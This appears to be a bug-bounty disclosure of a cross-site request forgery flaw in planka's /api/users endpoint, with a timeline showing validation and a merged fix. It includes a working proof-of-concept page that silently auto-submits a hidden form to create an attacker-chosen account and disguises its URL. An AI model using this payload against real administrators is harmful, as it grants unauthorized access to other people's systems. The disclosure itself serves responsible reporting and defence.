Cross-Site Request Forgery in plankanban/planka

Valid

Reported on

Aug 4th 2022


Description

The administrative /api/users registration endpoint is vulnerable to Cross-Site Request Forgery because it performs no anti-CSRF token verification of any kind: a state-changing POST is accepted as long as the victim's browser attaches the administrator's credentials, which it does automatically for a form submitted from any origin, including an attacker-controlled page.

Proof of Concept

  1. An authenticated administrator visits an attacker-controlled website, in this case the PoC file below.
  2. When the page loads, the form is auto-submitted and a new account is created with the attacker-chosen credentials.
<html>
    <body>
        <!-- replace the PoC URL in the address bar so the visit looks like the site root -->
        <script>history.pushState('', '', '/')</script>
        <!-- plain form POST: the victim's browser attaches its stored credentials; no CSRF token is needed -->
        <form action="http://localhost:3000/api/users" method="POST">
            <input type="hidden" name="action" value="post" />
            <input type="hidden" name="email" value="attacker-email@email.com" />
            <input type="hidden" name="password" value="password" />
            <input type="hidden" name="name" value="attacker-name" />
            <input type="hidden" name="username" value="attacker-username" />
            <input type="submit" value="Submit request" />
        </form>
        <!-- submit immediately on load, without any user interaction -->
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

An attacker can log in to the platform through the newly created account, with credentials they chose, without the administrator's knowledge.

We are processing your report and will contact the plankanban/planka team within 24 hours (2 months ago)
We have contacted a member of the plankanban/planka team and are waiting to hear back (2 months ago)
Maksim Eltyshev validated this vulnerability (2 months ago)
vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Maksim Eltyshev confirmed that a fix has been merged on 778653 (a month ago)
The fix bounty has been dropped
create.js#L63-L82 has been validated